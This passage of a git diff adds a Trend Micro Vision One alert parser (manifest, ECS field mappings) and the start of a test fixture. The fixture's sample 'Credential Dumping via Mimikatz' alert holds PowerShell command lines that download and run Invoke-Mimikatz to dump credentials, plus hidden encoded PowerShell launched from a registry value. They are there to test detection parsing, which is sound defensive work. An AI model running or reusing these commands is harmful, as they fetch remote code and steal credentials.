z^i9koOnwLd%FHjsRugp%>w)kD;t;GhH5$_&duJPmLz(^IE9Ad!6akVqxR#}62y=_(
z$be0+%AV7a#da2<Fu_QkoC#Lsahx`8JUF%d%2K1fb6iUHnLXXyN5o~-SWt9c)t1qh
z3bv7Je0W^Kbg1)+o#g%&(QKpnzgFr$Me*hWxujL@Zt|dHnI0rwsZk`ZIq$brNCu6_
z6683aYJqC)<^4}x-Iq?M^JjAh<^uPjcN<))G^@QKWBKkGcqSmqle|~)Nkm&u8!bW;
zudT4B>>|TlZ@}i9uzIhe2dUDK9zhBi3Go4|JXRQOl6Rw|&B+)ix`oCR%_FQBWs+VJ
zez>%QPx$s>h2mwp9PP8js*LTOs?B#PJ$C1Ty<4RW19_FL3Ccxz-8;!N2j*o|FhN8r
z(Y%LJ2OtjnSsk^c;DhL7ueR&APGPp3-X4v->8P=Fl@1i2(HI@&qm_2{awCfuuz~2^
z<|6Z^Lw-8}67C?J@+QJTP^y9sS5ozhp=*_Y%H*fcqbDIsUF;b;GISKNC31~O+-Jv$
z@6G?9Iz?It;r&Pkp55U0K9urBprGK-#^s6ZZa$WCZFSFv(hOt8i$~h1;K@04l>$a(
zv&Tfcq24(Vd;n|xVEIYt1&cA9A_jfNp`mX=-onw+TPR?i62(fKI5X*yVpw6_>L`--
z$1eU7Y1K%i#Wva6!ZMZ#0^KhDGrQ4jfYDe!#qPcMshoFeT6=Le-N0@F?pIkfuY4U~
zX?w<1_Xf4smtWgs8$D2{v!uXq+12;`(4gC!OK0o5jnCb(_uI;XJURKa!tDEFnCVsa
zeO#_of{fsbSd{M&K7oL!Z&fp`rLxG!-;~i0<46g9{;Z2OTvVyhk-7gRtZ_-n<?m^>
z)+K6Q{t{O81zk{xTrFl0Y30MUt2Wk#rOXD}w?imnG-PpGva`qIM+vu90T$=FT+EmY
znS78dH%8TeHo&C7zaO$rDw*y@G#3t^M)BUnuZEH9Rwl4C@FNQC#0S3p-R&OASc3vY
zwLV-nwm$pqrqW!y%7<cwJNY_f@pLmfdI4W+OYZcaaN|BRia0QTDa1PYJs4L=tbq-m
zOmI>_VpbxcOm4!!k}Ns-V!6YN4#s$*V(17;DJap0jHs7cB@ry#pyaaS`W3dWCha~;
z>oL(iuCf;glmIPioYcjpS<s%5M)7xnJHL3lTF@Z<Z#$K;D1iuw(Cok_*yYc;;H(Wj
zsz2&qPhL`pH(#OgD8h^=P1Vm%H<r|;$-V`iqkp_^*Q2>T#LmD#9b#n~`FCI_k#33s
zN!-P^5pI|9HGUoL?&EfTFE&F6Bfa|11EZGfhdTiZ+Hbq!Rt<MSUuMnO_lbBr`qd!)
zb26A@&tQzs{*%SozULqxY5xMQa-RDBNJzY)b>T4ycnv8gDvq6V;I-6k5mzXBJj>eg
zuKhv;t@})6&lZNkALAS8LZlI&yKY=t)0@ldDu`24+RFQd>mg$*&})%+{Shm^Pbp%M
zUX2WP9hXVked$)1`gvj6FjM;JH#wLB7M747bFAPwsYJhviUT*drR16>cBKn@>^`x6
zy<9h<rA!pfyb#*}L;sG(HdG)xP}`3J5jLW9T~3TNz5WwLfzEY(sy}m7nvCT-JbmOH
zi+^btGo<-HizJ6&&|Q?!<!&DY#nP!!!0vy5W`d|u7o1(|MGp+oNx|PI)dxWPbhN#w
z%Ux!{gMUfq!mOEgGdNte6;Pj$A?;R$sW&uH7nE+Qo+eWBUx%51R1bO|Ds8QB{QX{r
ziYIvJ!ag)M?IXA`?evX7eYyDmQiGY7aJYQcEwy4*8c6j8X<5csg`Y*HCuQ=oq<X)}
zbc(n6aODFz*Yo2#sH-d5_*i@J()FYK+TcUd4b9U;-7p{ip0hgH37JAn;4eVucs$S-
zYgK$wtoyb16E6I93tnw{J-tzBL`g(1t806oXZ)ks2IsQ3UAPr18skV6Un9PU0aV$9
zida|x<3}~qs3(h@x=gO*)<|cV&d9d@*I|Q>ARqZ@bH`3WQ*no<|7#Gm;BrMI9bW1L
z3;e3X8c>Fid+J(pb1y9qrzG`rQdv^o=XHidx}&Gc1;nR-M>;lvo>L-9;0b&^8~L#L
zJ{OWWbMDi4{mcVxtc>@;P~(7X6W(HuHuFR2!cTw2h@9apip?u_<P}wF&)4)%BwD7?
zsumu7*6KFB>-^2ZYf}?Mc1nr`9f#J(@5A3uTRYl%V<KbhZSjjg7SQD;?|ZOm$y#DU
z_Dj8{dGr)vsPSbJb6FuW*ae7tAkecH#3V^@D-<L)o;gk-<6PI*28&5&^<5Kc>=I|U
zCx!keqP?a}usPrv%Fb+=BRF^vvw;F)_*6d-#Ls#V7)<rRImkRbv(=yBR<MTm{3!y9
z@y#Puwt7fGxAkGB=qG^rMIF#&!V+F76|e84Gbm5BVBAw_yALLC;V^-r59+MW?tiw@
zxXE#$!JreWHR*@H_4F%OS_8-AZ`FsS%CE38cX9CgJ>L}<zY!mkG%F2NH1Eupotcnf
zs7D409~nX7RjDUrLIK8h6c{|Ep^&Jl$ASC-o-<+OxfB=t6$;imT}Vt6YYOyv1u7sH
z9eqq-v?$%YxJHGi=s{qG=~e4oJ>*&TRj6VA=st1eC-?u~nqp>Tc5BZpNGOSrwgXj0
zyd;Ht8%80~Sfd{AOKN@4q{Xe6^0B+PM~SKLLgJ{27!~nCsWMz>{m@D-Y`2~>`#=R+
zSm!waK>bV)^Jf#BjKq0f`lUzm+$YsIw?L7BV`w3G%n(?*AODKp-t-N{zws8|mn~|g
zksNgNJCU+qAj~Y33rc#@-X~&FdNXy1PAg$%D1+FU%lAY37F!QjD^qks(Ah;VJ>#r;
zRWLrx<RIfP6W;G>YTwHY&uSQdyQbMK-{5)wEeTMZKykOU%<J=eS)&=X<+tQ7AB<TD
zOJ(U<*v<s8vpfJP_%3!{VQKM;3*t*v)_zyi2N++H=xboFre_FKO)>+YsIn)tIwFzW
z#miDTR%75c?w1V_9`;pkl7Iq!KTUobe+8NQ)sE%v@Ro}jbmI_j0zne+@-tLt$~=`!
z0<{n<vp~<#beVlXtj5X+vi|p0H2)QAplx+!=fz*eT_s)Vh8D?%2I~K2eq)bAT+(Gw
zp4p_Ep0W4T@uo=HNWS5L+SQo}{%O#K1MWGVx`nqw2IE6)+OCEuP@ic|K6X4<`^y|O
zZ^e}ks<atbMn9SUmxUTh$U|ABB538@zMk`^9dkF@ptP@TQ#vgTXC8p_u!N?)rt^2S
z-}sAS>%(Iri=f;KlbxUenjUCa_ZFoye^DXQGIzsD>Bwd6R5i#HvyNo5_e`h>WdTbr
zOv<Qsz*^&o%1?$9bDmzZ$KvBJU*GPpH9XRltV^hZWTSIUaj3=vvFTVE3w0DN3tjIS
zY?ug#ho?AtWA=-5p_3-mHC)_pWNYGy`J}le!>W$9v26QmKp24zNi*TafH02~218DJ
zrB3%G|3$oy)|$FBzIlHdU>;Tc1M`(@q8&vr8z~q}M+G{;xfpOhJ|97*dPQQgP}vgT
ze-FYrxoc-;BDoy{x+)`PXkI9Tn#B>fjK)yOAap2<oXc%s`3ZNjmW%P1mmz3XGoLU&
z7#Zi+fNC6a^S#=tP*0@NVBsIgNoNDsg`UYZTF)dm73S0p8fjqC$86X}H$Cqn42eN|
zyt6XG-N~ubo*$&K8C#hE(P}46mTBkvX}>Uk+e**s$i@l^3C`^FRD#L!v{o`8k714T
z<*~-l@{Q4xoK71XS41DR2Spx43#g@_8$Zcn!lLqnl6eFXcRd3`bvY>}!3hHKC<yU|
z2qdA;2E|F@z^co1e@oVTgZF;pLwMY2^D77BXh9oodY)PeH0J~K{I=XKzJlpaVPl>?
zyrQ(;KS;M$NG1-G0+R4Feg-1w>hi0o!bcqhMZ#X7ZvEB}3rHehv|-WFq4-dzeHCb<
zM<8>bOP0UEK$|0(eG4N|!OpmcEURoCss*B)m8eI)tb+P(x^WSeBKx?yT>HT+!X`pd
zZ>WL8!|q9bVHoD!`H4Yj&Hv?TW`0<f7HpO^oi|Bp20GdJoMJ_9o&XGi5Coj}Ps+0n
zfFfKdIF=zJf-=m6`URdDtXE3a-JQjMV;dg<aa%V|@6IM4JRp5)(%r|@_g)HlW2K1p
zQ0*K{;zIqv$oTy)@BLCjp`^YD(ANd_XVFqAu1tPpLc1GT^)zx)X@k*G2E~>yS#F$}
zW~4*R7ylsdOe$<`)|$|DpEq9!+gl9wbW(NgqTle*=Nr8j1ByC}l1lkp;DFHv%$KOX
zTKu#ya`Sa~^zclwb5(av`YJ|vCc=qEtr3YH+Cs$ZJ6Gc&mzUGWav`VgQ&q-K{ti?J
zV1Pwzn!Boh)GRLr_TPNm-RF4GhdosiPO5hg4<i5Kn4#(8yA<!S<7DyIWlzCx=wJ|r
zxMfM`tVn!{JVlqK$<@*yL<fsXgl-<LN)`qMB&N_GD>QoQ;QlS}Xug25h?0=27eQeT
z{Lp)YiR+U;I?J)T*tyMQEEvk6#OjKlcWm`-`LnMIIZ(_^1O$wL!NCMT=R=&i4CJg9
z8u|-Il_}1OI+P9NL+o2tP(^umC(mo3p#c_XlcW6Q|Lc-}E~p|X=e2wunThm_xG;Pp
zBU3D@cBy}mbyBn3b76Rf_Oug0QAmUPSREI=In9TJ6zEaX7i77RhT5u#{`hc}iCw_%
zC$&7XU3wO1p&W6vkj=Ykijqumz=_Jd8k6xHCWW-Re`V3?eFRb=Em+j--e8!6)L?fL
zY3luaKQmU!4Nf|GTg1X+N}inE!ECh>3zrug_kU!|RdGjl<Fx%u1S6Io-@SwP(SDyM
z@tGvmu+-+!ax^?;IVml9b-8XNb-f?aNr<2QTdW2mP1Yj@Y0#l&cbF+PmXY_f*ypQa
zX5GDq_wk37D;UiUl!_Av*5)eeT#!X#b>aSaZh?lpo9}pCO-<)I@Ot@x+8`@#9xX;u
z2hnHaUg6@vR-^b{AxU%oqU8aYB=^w)--Zv4RRS_rJ89Qw<NWj6ty1rC&V8uGfyOvH
zAVmpkqto@9l8;W=z)wLa0qXZI8HEXw>xcHD<Naf47z+Pw2>1dNUWipa3XV_snqHQe
z4o_-AHD&Qa`=B^K_lqR@tII$AHd6TCm`vw6iTWGzk7G#mj5ibzkop9djZ~c8D{17F
z<deO15QaktuqkTz8(4sn16=|_X5lsFdlB(yLIQ$A2%4^k>e1vM50L1o(G(DHe+Mib
z+17*wrp1#y>g3we${`O@rHPR|mEfreBszs$1p#MM@!PJ!rbc`qb)C}LD!|-r2tUyR
zL<pGZ3WhUn;K(w^%T5%;BU1tEj4!ATf>F`k<QKFT^xLB<+NWio(h!u?cW2>YJP{C-
zEn-hiWbh`_4;?|rg8(=$Q+iB`hr>e~zoa9Zd<K_0hGpBWbO!ET6I}{sIR92Of1}%t
z66$!p@9&IWH+8#8*h)#?{ojv$QqE`O{u?oHSE)O48>K6%#G6NV2_`Z-?K6ti;qq6>
z`6BS4kVhUA0n)}3#D6xRbo8sfQWYkZmZqWFR!67eB-ag$-*9|4MBxzHWZ+H$F|?5K
zU;45!R^c&KwVReE(aYZSuvC}agUFX7(GIZlN7Dtk-5^52Zp%q%T}6L_XQ5&wd01GK
z(*;y=|6|`dh#A)W+h~W`s^x<hyjx6@cFq6c16Ub^N(%ltiK+RjwF&kEgoJ8y&QEow
zJ-G%;<roU@@OtCEis2e&sPZ;+c@Xj#to~eE=FtlDw-Y`vgT(&DgF<@}S{E)xo7mU#
z-QP!>33;?EdSZoE#HEY4yUd8C<4LHuK5JR9-u)LQ<)E8RjHyp5IKzaGQIM8+`c5{i
z5!c8?MR)vu1ULFHxFthnWlwq*j&dbAKPM(Af8FcjfR3q;<&g8-h73b!N<c9zJqo-P
zv#@j3&Io6$oC0E&b7Px?&V^l@r#>rv&7GRBA+Mx&_d5!3<;Lo|k`0ph@i$ZK3G+<p
zAzzi;5l4-UY^MV0x{|m26fk%GBQli|^C22$x)nza87W?sn0&<Ga2-Wqjs|2$@I(h(
z-@>&TK3Duv5*A4Ija_Ed-Y6DL%i=Rf6O9%7c&oV3QVzYec;S~R+&b=_ryMnpVz{L%
z<pf*jpw5hxTQc5)cQ27EL|Q?8E0;BXxc2-1#ZD|~mJaKQg{8GqO>QkK5RWZP)=$c>
zVPjH6Tj}&V$t#)BWi&ogBOc>i<Z7Vh`v9(8J$z_pe$Ujq5<{wx(I-_lE(BZ)BNcI-
zqqv;ytfEri!rsRXeVw!Gh=-Z+Ch=+fvzR1AQ_qcWO~o5$NqM<VmO@5y8$<j7I&c{c
ziuZ&l;j2v{{n*RHFmx3IaLElS9Cge<W%Whw10yQg;Yk|-Qc34oa1oOK<IlKPe%qrv
zF&eB~kJ8f!L$;HNq;bYl4kwDA^vZ=PWW+>K?kk7>s`YkMz+Cy0e2rG9io1|>J^S!7
wM>ZBJ6Q<xvVH~)maYBQ57xlk8fOOX(jJ2z{JcLr<nj!?Ete_!ZC2JA>e~@DrfdBvi

literal 0
HcmV?d00001

diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml
new file mode 100644
index 000000000..c0121a28d
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml	
@@ -0,0 +1,9 @@
+uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e
+name: Trend Micro Vision One
+slug: trend-micro-vision-one
+
+description: >-
+  Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation.
+
+data_sources:
+  Process monitoring:
diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json
new file mode 100644
index 000000000..e69de29bb
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
new file mode 100644
index 000000000..38a31dd29
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
@@ -0,0 +1,79 @@
+name: trend-micro-vision-one
+ignored_values: []
+pipeline:
+  - name: parsed_event
+    external:
+      name: json.parse-json
+      properties:
+        input_field: "{{original.message}}"
+        output_field: message
+
+  - name: set_ecs_fields
+
+stages:
+  set_ecs_fields:
+    actions:
+      - set:
+          event.kind: alert
+          event.category: ["intrusion_detection"]
+          event.type: ["info"]
+          observer.vendor: "TrendMicro"
+          observer.product: "Vision One"
+
+      - set:
+          "@timestamp": "{{parsed_event.message.createdDateTime}}"
+
+          organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}"
+          organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}"
+          host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}"
+          host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}"
+
+          user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}"
+          container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}"
+          container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}"
+
+          rule.name: "{{parsed_event.message.model}}"
+          rule.id: "{{parsed_event.message.model.modelId}}"
+
+          event.url: "{{parsed_event.message.model.workbenchLink}}"
+
+          process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}"
+          process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}"
+
+          registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}"
+          registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}"
+
+          registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}"
+
+          registry.path: >
+            {%- set path = [] -%}
+            {%- for indicator in parsed_event.message.indicators -%}
+              {%- if indicator.type == 'registry_key' -%}{%- set path = path.append(indicator.value) -%}{% endif %}
+            {%- endfor -%}
+            {%- for indicator in parsed_event.message.indicators -%}
+              {%- if indicator.type == 'registry_value' -%}{%- set path = path.append(indicator.value) -%}{% endif %}
+            {%- endfor -%}
+            {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%}
+
+          # @todo should be along with registry.data.type to REG_SZ
+          registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}"
+
+          file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}"
+          file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}"
+          file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}"
+          file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}"
+
+          process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}"
+          process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}"
+          process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}"
+          process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}"
+          process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}"
+
+          user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}"
+
+          trendmicro.vision_one.severity: "{{parsed_event.message.severity}}"
+          trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}"
+          trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}"
+          trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}"
+          trendmicro.vision_one.status: "{{parsed_event.message.status}}"
+          trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}"
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
new file mode 100644
index 000000000..5eca6b2ea
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json	
@@ -0,0 +1,66 @@
+{
+  "input": {
+    "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}"
+  },
+  "expected": {
+    "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}",
+    "event": {
+      "category": [
+        "intrusion_detection"
+      ],
+      "kind": "alert",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2022-09-06T02:49:30Z",
+    "file": {
+      "directory": "c:\\windows\\system32\\windowspowershell\\v1.0",
+      "hash": {
+        "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254"
+      },
+      "name": "powershell.exe",
+      "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
+    },
+    "host": {
+      "ip": [
+        "10.10.58.51"
+      ],
+      "name": "nimda"
+    },
+    "observer": {
+      "product": "Vision One",
+      "vendor": "TrendMicro"
+    },
+    "organization": {
